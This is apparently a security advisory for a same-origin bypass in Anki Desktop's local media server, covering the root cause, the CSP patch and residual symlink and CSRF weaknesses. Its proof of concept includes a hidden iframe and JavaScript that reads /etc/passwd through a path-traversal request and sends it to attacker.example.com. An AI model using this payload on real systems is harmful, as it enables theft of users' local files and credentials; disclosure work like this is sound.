GHSA-CW6H-FFMH-X6VH: Arbitrary Local File Disclosure via Same-Origin Policy Bypass in Anki Desktop

Anki Desktop utilizes an embedded browser framework based on QtWebEngine to render flashcards. To facilitate rendering media assets and communicating with the core Rust backend, Anki executes a local WSGI HTTP server (mediasrv.py) driven by Waitress. This server binds to the localhost interface on a dynamically selected TCP port.

Because the browser interface processes arbitrary user-supplied card contents, Anki must enforce strict origin boundary controls. If user-submitted files execute within the same origin as the local management API, they gain access to restricted endpoints. This vulnerability permits untrusted resources to bridge the security boundary and read local configuration files, databases, or keys.

The root cause of GHSA-CW6H-FFMH-X6VH is the complete absence of a Content Security Policy (CSP) header on served media assets, coupled with shared origin execution. When a flashcard renders an HTML or SVG media element, the assets are loaded from the loopback address (e.g., http://127.0.0.1:port/media/file.html).

Because the parent page and the iframe share the exact same protocol, domain name, and port, they belong to the same origin. The browser's Same-Origin Policy permits scripts inside the frame to access the parent DOM structure and query internal APIs directly.

By leveraging endpoints such as getImageForOcclusion—which accepts paths and retrieves local disk resources without directory-traversal mitigation (CWE-22)—the script reads host files. The isolated origin context can then immediately transmit this retrieved information to external systems using simple cross-origin image requests.

Prior to the implementation of the patch, the application server processed file requests inside _handle_local_file_request(req) without validating origin trust or appending security headers. The mitigation resolves this issue by introducing UNTRUSTED_MEDIA_CSP inside qt/aqt/mediasrv.py.

This policy restricts scripting, network requests, frame loading, and enforces a unique sandboxed environment.

# Defined sandbox CSP policy within the patched media server
UNTRUSTED_MEDIA_CSP = "; ".join([
    "default-src 'none'",
    "script-src 'none'",
    "connect-src 'none'",
    "object-src 'none'",
    "frame-src 'none'",
    "child-src 'none'",
    "base-uri 'none'",
    "form-action 'none'",
    "sandbox"  # Enforces an opaque, isolated origin
])

During file dispatch, the media server checks the request.untrusted flag and appends the policy to prevent script execution on active documents.

# Response generation with CSP header injection
response = flask.send_file(
    fullpath,
    mimetype=mimetype,
    conditional=True,
    max_age=max_age,
    download_name="foo"
)
if request.untrusted:
    response.headers["Content-Security-Policy"] = UNTRUSTED_MEDIA_CSP
return response

An attacker exploits this design flaw by preparing a custom deck archive containing a malicious page, payload.html, and a flashcard layout containing an invisible frame.

<iframe src="payload.html" style="display:none;" width="0" height="0"></iframe>

When loaded, payload.html executes JavaScript inside the local origin. The script calls the vulnerable endpoint, exploiting directory traversal to locate sensitive target directories.

async function exfil() {
    let fileRequest = await fetch('/_anki/getImageForOcclusion', {
        method: 'POST',
        headers: { 'Content-Type': 'application/binary' },
        body: JSON.stringify({ path: '../../../../../../../../../../etc/passwd' })
    });
    let content = await fileRequest.text();
    new Image().src = 'https://attacker.example.com/log?data=' + btoa(content);
}
exfil();

This script runs transparently whenever the card is viewed, leaking host files without raising errors or warnings to the user.

This vulnerability is classified as Medium severity with a CVSS 3.1 score of 6.5. Successful exploitation allows an attacker to retrieve any local document readable by the active user account.

Threat actors can target credentials, private keys, browser session stores, and internal program configurations. Because the execution engine retains outbound connection capabilities, the retrieved information can be sent immediately to external capture points.

The attack requires the target user to manually import a compromised deck, limiting direct automated exploitation vectors.

The introduction of UNTRUSTED_MEDIA_CSP successfully neutralizes immediate scripting execution paths. However, the traversal check in ensure_safe_path contains potential design limitations. The path verification checks are performed using os.path.abspath instead of resolving final files.

def ensure_safe_path(base_dir, path):
    base_dir = os.path.realpath(base_dir)
    path = os.path.normpath(path)
    fullpath = os.path.abspath(os.path.join(base_dir, path))
    if not fullpath.startswith(base_dir + os.sep):
        raise UnsafePathException(path)
    return fullpath

Because os.path.abspath does not resolve nested symbolic links, a zipped deck containing functional symbolic links could theoretically trigger an external file read when processed by the operating system file server.

Furthermore, HTTP GET queries triggered by HTML tags (such as <img>) do not carry Origin HTTP headers, which may expose GET-based administration parameters to Cross-Site Request Forgery (CSRF) attempts.